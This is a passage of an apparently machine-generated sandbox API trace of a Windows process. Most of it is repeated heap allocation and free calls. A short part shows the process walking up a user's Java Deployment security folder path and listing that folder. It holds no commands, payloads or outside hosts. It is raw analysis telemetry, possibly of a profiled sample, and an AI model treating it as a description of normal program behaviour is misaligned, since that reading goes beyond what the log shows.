| out: hHeap=0x630000) returned 1 [0238.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.126] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.126] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.127] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.127] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.127] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\") returned="security\\" [0238.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0238.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ec88 [0238.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0238.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0238.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ec88 | out: hHeap=0x630000) returned 1 [0238.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0238.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3d60 [0238.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0238.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0238.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0238.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b3d60 | out: hHeap=0x630000) returned 1 [0238.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0238.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0238.128] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.128] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf768 [0238.128] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0238.129] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0238.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0238.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0238.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf768 | out: hHeap=0x630000) returned 1 [0238.129] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.129] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0238.129] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.129] PathFindFileNameW (pszPath="") returned="" [0238.129] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b64c8 [0238.129] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b64c8 | out: hHeap=0x630000) returned 1 [0238.131] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.131] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0238.131] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0238.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6960 | out: hHeap=0x630000) returned 1 [0238.131] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ec88 [0238.131] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.131] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.131] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.132] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.132] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.133] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.133] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.134] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.134] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.135] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.135] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0238.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0238.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.136] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.136] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.137] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.138] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.138] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.139] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.139] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65ebf0 | out: hHeap=0x630000) returned 1 [0238.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65ebf0 [0238.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.140] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0238.140] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.140] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS 